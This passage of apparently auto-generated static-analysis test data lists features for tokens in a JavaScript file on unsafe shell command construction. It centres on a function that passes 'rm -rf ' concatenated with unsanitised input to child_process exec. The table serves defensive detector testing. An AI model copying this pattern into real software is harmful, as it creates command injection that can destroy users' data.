CalleeFlexibleAccessPath | cp.exec | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:521:11:521:26 | "rm -rf " + name | InputArgumentIndex | 0 | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:521:11:521:26 | "rm -rf " + name | calleeImports | child_process | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:521:11:521:26 | "rm -rf " + name | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:521:11:521:26 | "rm -rf " + name | contextSurroundingFunctionParameters | (name) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:521:11:521:26 | "rm -rf " + name | enclosingFunctionBody | name cp exec rm -rf name isNaN name cp exec rm -rf name cp exec rm -rf name isNaN parseInt name cp exec rm -rf name cp exec rm -rf name isNaN name cp exec rm -rf name cp exec rm -rf name isNaN parseInt name 10 cp exec rm -rf name cp exec rm -rf name isNaN name 0 cp exec rm -rf name cp exec rm -rf name isNaN name 0 cp exec rm -rf name cp exec rm -rf name | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:521:11:521:26 | "rm -rf " + name | enclosingFunctionName | sanitizer4 | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:521:11:521:26 | "rm -rf " + name | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:521:11:521:26 | "rm -rf " + name | receiverName | cp | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:521:23:521:26 | name | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:521:23:521:26 | name | contextSurroundingFunctionParameters | (name) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:521:23:521:26 | name | enclosingFunctionBody | name cp exec rm -rf name isNaN name cp exec rm -rf name cp exec rm -rf name isNaN parseInt name cp exec rm -rf name cp exec rm -rf name isNaN name cp exec rm -rf name cp exec rm -rf name isNaN parseInt name 10 cp exec rm -rf name cp exec rm -rf name isNaN name 0 cp exec rm -rf name cp exec rm -rf name isNaN name 0 cp exec rm -rf name cp exec rm -rf name | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:521:23:521:26 | name | enclosingFunctionName | sanitizer4 | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:521:23:521:26 | name | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:521:23:521:26 | name | stringConcatenatedWith | 'rm -rf ' -endpoint- | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:524:6:524:10 | isNaN | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:524:6:524:10 | isNaN | contextSurroundingFunctionParameters | (name) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:524:6:524:10 | isNaN | enclosingFunctionBody | name cp exec rm -rf name isNaN name cp exec rm -rf name cp exec rm -rf name isNaN parseInt name cp exec rm -rf name cp exec rm -rf name isNaN name cp exec rm -rf name cp exec rm -rf name isNaN parseInt name 10 cp exec rm -rf name cp exec rm -rf name isNaN name 0 cp exec rm -rf name cp exec rm -rf name isNaN name 0 cp exec rm -rf name cp exec rm -rf name | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:524:6:524:10 | isNaN | enclosingFunctionName | sanitizer4 | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:524:6:524:10 | isNaN | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:524:6:524:17 | exceptional return of isNaN(+name) | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:524:6:524:17 | exceptional return of isNaN(+name) | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:524:6:524:17 | exceptional return of isNaN(+name) | enclosingFunctionBody | name cp exec rm -rf name isNaN name cp exec rm -rf name cp exec rm -rf name isNaN parseInt name cp exec rm -rf name cp exec rm -rf name isNaN name cp exec rm -rf name cp exec rm -rf name isNaN parseInt name 10 cp exec rm -rf name cp exec rm -rf name isNaN name 0 cp exec rm -rf name cp exec rm -rf name isNaN name 0 cp exec rm -rf name cp exec rm -rf name | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:524:6:524:17 | exceptional return of isNaN(+name) | enclosingFunctionName | sanitizer4 | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:524:6:524:17 | exceptional return of isNaN(+name) | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:524:6:524:17 | isNaN(+name) | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:524:6:524:17 | isNaN(+name) | contextSurroundingFunctionParameters | (name) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:524:6:524:17 | isNaN(+name) | enclosingFunctionBody | name cp exec rm -rf name isNaN name cp exec rm -rf name cp exec rm -rf name isNaN parseInt name cp exec rm -rf name cp exec rm -rf name isNaN name cp exec rm -rf name cp exec rm -rf name isNaN parseInt name 10 cp exec rm -rf name cp exec rm -rf name isNaN name 0 cp exec rm -rf name cp exec rm -rf name isNaN name 0 cp exec rm -rf name cp exec rm -rf name | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:524:6:524:17 | isNaN(+name) | enclosingFunctionName | sanitizer4 | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:524:6:524:17 | isNaN(+name) | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:524:13:524:16 | name | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:524:13:524:16 | name | contextSurroundingFunctionParameters | (name) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:524:13:524:16 | name | enclosingFunctionBody | name cp exec rm -rf name isNaN name cp exec rm -rf name cp exec rm -rf name isNaN parseInt name cp exec rm -rf name cp exec rm -rf name isNaN name cp exec rm -rf name cp exec rm -rf name isNaN parseInt name 10 cp exec rm -rf name cp exec rm -rf name isNaN name 0 cp exec rm -rf name cp exec rm -rf name isNaN name 0 cp exec rm -rf name cp exec rm -rf name | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:524:13:524:16 | name | enclosingFunctionName | sanitizer4 | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:524:13:524:16 | name | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:525:3:525:4 | cp | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:525:3:525:4 | cp | contextSurroundingFunctionParameters | (name) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:525:3:525:4 | cp | enclosingFunctionBody | name cp exec rm -rf name isNaN name cp exec rm -rf name cp exec rm -rf name isNaN parseInt name cp exec rm -rf name cp exec rm -rf name isNaN name cp exec rm -rf name cp exec rm -rf name isNaN parseInt name 10 cp exec rm -rf name cp exec rm -rf name isNaN name 0 cp exec rm -rf name cp exec rm -rf name isNaN name 0 cp exec rm -rf name cp exec rm -rf name | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:525:3:525:4 | cp | enclosingFunctionName | sanitizer4 | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:525:3:525:4 | cp | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:525:3:525:9 | cp.exec | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:525:3:525:9 | cp.exec | contextSurroundingFunctionParameters | (name) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:525:3:525:9 | cp.exec | enclosingFunctionBody | name cp exec rm -rf name isNaN name cp exec rm -rf name cp exec rm -rf name isNaN parseInt name cp exec rm -rf name cp exec rm -rf name isNaN name cp exec rm -rf name cp exec rm -rf name isNaN parseInt name 10 cp exec rm -rf name cp exec rm -rf name isNaN name 0 cp exec rm -rf name cp exec rm -rf name isNaN name 0 cp exec rm -rf name cp exec rm -rf name | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:525:3:525:9 | cp.exec | enclosingFunctionName | sanitizer4 | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:525:3:525:9 | cp.exec | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:525:3:525:27 | cp.exec ... + name) | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:525:3:525:27 | cp.exec ... + name) | contextSurroundingFunctionParameters | (name) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:525:3:525:27 | cp.exec ... + name) | enclosingFunctionBody | name cp exec rm -rf name isNaN name cp exec rm -rf name cp exec rm -rf name isNaN parseInt name cp exec rm -rf name cp exec rm -rf name isNaN name cp exec rm -rf name cp exec rm -rf name isNaN parseInt name 10 cp exec rm -rf name cp exec rm -rf name isNaN name 0 cp exec rm -rf name cp exec rm -rf name isNaN name 0 cp exec rm -rf name cp exec rm -rf name | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:525:3:525:27 | cp.exec ... + name) | enclosingFunctionName | sanitizer4 | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:525:3:525:27 | cp.exec ... + name) | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:525:3:525:27 | exceptional return of cp.exec ... + name) | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:525:3:525:27 | exceptional return of cp.exec ... + name) | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:525:3:525:27 | exceptional return of cp.exec ... + name) | enclosingFunctionBody | name cp exec rm -rf name isNaN name cp exec rm -rf name cp exec rm -rf name isNaN parseInt name cp exec rm -rf name cp exec rm -rf name isNaN name cp exec rm -rf name cp exec rm -rf name isNaN parseInt name 10 cp exec rm -rf name cp exec rm -rf name isNaN name 0 cp exec rm -rf name cp exec rm -rf name isNaN name 0 cp exec rm -rf name cp exec rm -rf name | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:525:3:525:27 | exceptional return of cp.exec ... + name) | enclosingFunctionName | sanitizer4 | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:525:3:525:27 | exceptional return of cp.exec ... + name) | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:525:6:525:9 | exec | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:525:6:525:9 | exec | contextSurroundingFunctionParameters | (name) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:525:6:525:9 | exec | enclosingFunctionBody | name cp exec rm -rf name isNaN name cp exec rm -rf name cp exec rm -rf name isNaN parseInt name cp exec rm -rf name cp exec rm -rf name isNaN name cp exec rm -rf name cp exec rm -rf name isNaN parseInt name 10 cp exec rm -rf name cp exec rm -rf name isNaN name 0 cp exec rm -rf name cp exec rm -rf name isNaN name 0 cp exec rm -rf name cp exec rm -rf name | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:525:6:525:9 | exec | enclosingFunctionName | sanitizer4 | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:525:6:525:9 | exec | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:525:11:525:19 | "rm -rf " | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:525:11:525:19 | "rm -rf " | contextSurroundingFunctionParameters | (name) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:525:11:525:19 | "rm -rf " | enclosingFunctionBody | name cp exec rm -rf name isNaN name cp exec rm -rf name cp exec rm -rf name isNaN parseInt name cp exec rm -rf name cp exec rm -rf name isNaN name cp exec rm -rf name cp exec rm -rf name isNaN parseInt name 10 cp exec rm -rf name cp exec rm -rf name isNaN name 0 cp exec rm -rf name cp exec rm -rf name isNaN name 0 cp exec rm -rf name cp exec rm -rf name | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:525:11:525:19 | "rm -rf " | enclosingFunctionName | sanitizer4 | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:525:11:525:19 | "rm -rf " | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:525:11:525:19 | "rm -rf " | stringConcatenatedWith | -endpoint- name | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:525:11:525:26 | "rm -rf " + name | CalleeFlexibleAccessPath | cp.exec | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:525:11:525:26 | "rm -rf " + name | InputArgumentIndex | 0 | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:525:11:525:26 | "rm -rf " + name | calleeImports | child_process | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:525:11:525:26 | "rm -rf " + name | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, 